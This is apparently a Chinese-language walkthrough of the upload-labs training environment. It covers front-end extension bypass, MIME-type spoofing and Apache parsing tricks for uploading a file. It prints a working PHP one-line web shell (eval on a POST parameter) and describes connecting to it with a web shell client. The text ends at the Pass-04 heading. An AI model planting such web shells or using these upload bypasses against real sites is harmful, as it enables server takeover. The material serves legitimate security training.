搭建

https://github.com/c0ny1/upload-labs

Pass-01(前端绕过)

准备php一句话木马

1
2
3
4
<?php 
phpinfo();
eval($_POST['a']);
?>

传一句话木马时提示

image-20210508174925579

重命名后缀为png

image-20210508175133543

在burp中修改为php

image-20210508175124122

image-20210508180018350

连接菜刀

image-20210508180216841

Pass-02(MIME绕过)

清空上传文件

如同01中操作上传成功

当然也可直接上传php后缀文件

修改Content-Type 为image/jpeg

Pass-03(apache解析漏洞)

上传文件发现报错

提示:不允许上传.asp,.aspx,.php,.jsp后缀文件!

那么尝试修改后缀

如php3

image-20210508182044319

发现php3 不解析

那么尝试phtml

也不解析

查了下 好像要修改配置orz

修改 /etc/mime.types中

在这里插入图片描述

1
service apache2 reload

解析成功了

image-20210508184452310

Pass-04(Apache配置文件.htaccess)